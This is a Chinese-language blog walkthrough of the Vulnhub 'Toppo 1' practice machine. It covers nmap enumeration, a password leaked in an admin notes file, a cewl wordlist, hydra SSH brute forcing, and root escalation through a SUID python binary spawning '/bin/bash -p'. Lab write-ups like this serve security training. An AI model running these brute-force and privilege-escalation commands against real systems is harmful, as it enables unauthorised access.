首页 > 其他分享 >Vulnhub:Toppo 1靶机

Vulnhub:Toppo 1靶机

时间:2023-05-02 19:11:06浏览次数:55  
标签:http Toppo 192.168 Vulnhub 靶机 txt 111.130 12345ted123

kali:192.168.111.111

靶机:192.168.111.130

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.130

image

根据nmap的脚本http-enum收集到的信息,80端口的admin目录存放有notes.txt文件,根据文件内容得到密码:12345ted123

image

image

使用cewl收集目标web信息

cewl http://192.168.111.130/admin -w user.txt

image

利用收集到的信息配合之前的得到的密码爆破ssh,得到用户:ted,密码:12345ted123

hydra -L /usr/share/wordlists/rockyou.txt -p 12345ted123 192.168.111.130 -s 22 ssh -t 64

image

提权

查找suid权限的文件

find / -perm -u=s -exec ls -al {} \; 2> /dev/null

image

提权方法:https://gtfobins.github.io/gtfobins/python/#suid

image

/usr/bin/python2.7 -c 'import os;os.system("/bin/bash -p")'

image

flag

image

标签:http,Toppo,192.168,Vulnhub,靶机,txt,111.130,12345ted123
From: https://www.cnblogs.com/ctostm/p/17368068.html

相关文章

  • Vulnhub之Gain Power靶机详细测试过程
    GainPower识别目标主机IP地址(kali㉿kali)-[~/Vulnhub/Gainpower]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|ScreenView:UniqueHosts3CapturedARPRe......
  • Vulnhub之Gears of War靶机详细测试过程
    GearofWar识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Gearofwar]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:Finished!|ScreenView:UniqueHosts......
  • Vulnhub之Gigroot靶机详细测试过程
    Gigroot识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Gigroot]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|ScreenView:UniqueHosts3CapturedARPReq/R......
  • Vulnhub靶机笔记2——matrix-breakout-2-morpheus
    一、介绍一个以《黑客帝国》为背景的靶场涉及内容主机发现端口服务扫描1.2不用工具实现ffuf目录爆破一句话木马反弹shellmsf,蚁剑使用图片隐写CVE-2022-0847漏洞利用二、环境攻击机:kali靶机:matrix-breakout-2-morpheus三、过程1、信息收集1.1主机存活扫描nma......
  • Vulnhub之GreenOptics靶机详细测试过程
    GreenOptics识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/GreenOptic]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:Finished!|ScreenView:UniqueHosts......
  • Vulnhub:DerpNStink 1靶机
    kali:192.168.111.111靶机:192.168.111.130信息收集端口扫描nmap-A-v-sV-T5-p---script=http-enum192.168.111.130通过nmap的http-enum脚本发现目标80端口存在wordpress,访问目标网站的wordpress被重定向到http://derpnstink.local,修改hosts文件再访问通过wpscan枚举......
  • Vulnhub之Grotesque3靶机详细测试过程
    Grotesque3识别目标主机IP地址─(kali㉿kali)-[~/Desktop/Vulnhub/grotesque3]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|ScreenView:UniqueHosts......
  • Vulnhub靶机笔记01——Billu_b0x
    一、Billu_b0x介绍billu_b0x是vulnhub的一款经典靶机二、安装与环境下载地址:billu_b0x,下载后解压导入即可攻击机:kaili靶机:billu_b0x三、动手1.信息获取nmap扫描(1)主机存活扫描nmap-sn192.168.124.0/24┌──(root㉿kali)-[~]└─#nmap-sn192.168.124.0/24Star......
  • Vulnhub之Hacksudo Thor靶机详细测试过程(提权成功)
    HacksudoThor作者:jasonhuawen靶机信息名称:hacksudo:Thor地址:https://www.vulnhub.com/entry/hacksudo-thor,733/识别目标主机IP地址(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoThor]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56......
  • Vulnhub之Hacksudo Search靶机详细测试过程(不同提权方法)
    HacksudoSearch识别目标主机IP地址(kali㉿kali)-[~/Desktop/Vulnhub/HacksudoSearch]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|ScreenView:UniqueHosts......